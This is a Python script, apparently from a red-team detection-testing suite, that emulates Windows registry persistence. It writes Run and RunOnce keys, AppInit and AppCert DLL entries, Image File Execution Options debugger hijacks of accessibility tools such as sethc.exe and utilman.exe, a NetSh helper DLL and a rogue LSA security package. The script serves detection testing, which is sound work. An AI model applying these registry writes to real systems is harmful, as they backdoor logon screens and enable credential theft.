in cortado/rtas/registry_persistence_create.py [0:0]
def main():
log.info("Suspicious Registry Persistence")
for hive in (_const.REG_HKLM, _common.REG_HKCU):
_common.write_to_registry(
hive,
"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\",
"RunOnceTest",
TARGET_APP_EXE,
)
_common.write_to_registry(
hive,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",
"RunTest",
TARGET_APP_EXE,
)
_winreg_calls()
# Additional persistence
log.info("Adding AppInit DLL")
windows_base = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\"
_common.write_to_registry(_const.REG_HKLM, windows_base, "AppInit_Dlls", "evil.dll", restore=True, pause=True)
log.info("Adding AppCert DLL")
appcertdlls_key = "System\\CurrentControlSet\\Control\\Session Manager\\AppCertDlls"
_common.write_to_registry(_const.REG_HKLM, appcertdlls_key, "evil", "evil.dll", restore=True, pause=True)
debugger_targets = [
"normalprogram.exe",
"sethc.exe",
"utilman.exe",
"magnify.exe",
"narrator.exe",
"osk.exe",
"displayswitch.exe",
"atbroker.exe",
]
for victim in debugger_targets:
log.info("Registering Image File Execution Options debugger for %s -> %s" % (victim, TARGET_APP_EXE))
base_key = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\%s" % victim
_common.write_to_registry(_const.REG_HKLM, base_key, "Debugger", TARGET_APP_EXE, restore=True)
# create new NetSh key value
log.info("Adding a new NetSh Helper DLL")
key = "Software\\Microsoft\\NetSh"
_common.write_to_registry(_const.REG_HKLM, key, "BadHelper", "c:\\windows\\system32\\BadHelper.dll")
# modify the list of SSPs
log.info("Adding a new SSP to the list of security packages")
key = "System\\CurrentControlSet\\Control\\Lsa"
_common.write_to_registry(
_const.REG_HKLM,
key,
"Security Packages",
["evilSSP"],
_const.MULTI_SZ,
append=True,
pause=True,
)
pause()